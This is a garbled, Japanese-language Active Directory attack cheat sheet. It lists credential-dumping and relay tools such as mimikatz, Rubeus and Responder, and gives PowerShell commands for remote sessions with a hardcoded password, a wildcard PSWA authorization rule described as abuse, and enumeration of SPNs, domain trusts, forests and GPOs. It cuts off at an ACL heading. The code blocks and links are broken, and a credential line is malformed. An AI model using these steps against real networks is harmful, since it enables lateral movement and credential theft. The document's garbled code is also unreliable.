

こちらからサポートいただけます 🐱 :
このAD攻撃チートシートは、RistBSが作成したもので、Active-Directory-Exploitation-Cheat-Sheet リポジトリに触発されています。
Powershellツール :
[⭐] Nishang -> https://github.com/samratashok/nishangnishangには、Powershell環境でのWindowsペネトレーションテストに役立つスクリプトが多数含まれています。
powerviewはpowersploitのスクリプトで、横方向移動の可能性があるADアーキテクチャの列挙を可能にします。
列挙ツール :
[⭐] Bloodhound -> https://github.com/BloodHoundAD/BloodHound[⭐] crackmapexec -> https://github.com/byt3bl33d3r/CrackMapExeADエクスプロイトツールキット :
[⭐] Impacket -> https://github.com/SecureAuthCorp/impacket[⭐] kekeo -> https://github.com/gentilkiwi/kekeoダンプツール :
[⭐] mimikatz -> https://github.com/gentilkiwi/mimikatz[⭐] rubeus -> https://github.com/GhostPack/Rubeusリスナーツール :
[⭐] responder -> https://github.com/SpiderLabs/ResponderPS-Session :```powershell #METHOD 1 $c = New-PSSession -ComputerName 10.10.13.100 -Authentication Negociate -Credential $user Enter-PSSession -Credential $c -ComputerName 10.10.13.100
$pass = ConvertTo-SecureString 'Ab!Q@aker1' -asplaintext -force $cred = New-Object System.Management.Automation.PSCredential('$user, $pass') Enter-PSSession -Credential $c -ComputerName 10.10.13.100
### PSWA の悪用
資格情報を持つ誰でも任意のマシンと任意の設定に接続できるようにする
**[ ! ] この操作には資格情報が必要です。**```powershell
Add-PswaAuthorizationRule -UsernName * -ComputerName * -ConfigurationName *
PowerView を使用:```powershell Get-NetUser –SPN
> [AD Module](https://docs.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps) を使用 :```powershell
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
MapTrust :```powershell Invoke-MapDomainTrust
**現在のドメインのドメイン信頼 :**
> [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) を使用 :```powershell
Get-NetDomainTrust #Find potential external trust
Get-NetDomainTrust –Domain $domain
AD Module を使用する :```powershell Get-ADTrust Get-ADTrust –Identity $domain
### フォレスト列挙
**現在のフォレストの詳細 :**```powershell
Get-NetForest
Get-NetForest –Forest $forest
Get-ADForest
Get-ADForest –Identity $domain
GPOの一覧```powershell Get-NetGPO Get-NetGPO -ComputerName $computer Get-GPO -All Get-GPResultantSetOfPolicy -ReportType Html -Path C:\Users\Administrator\report.html
### ACL と ACE の列挙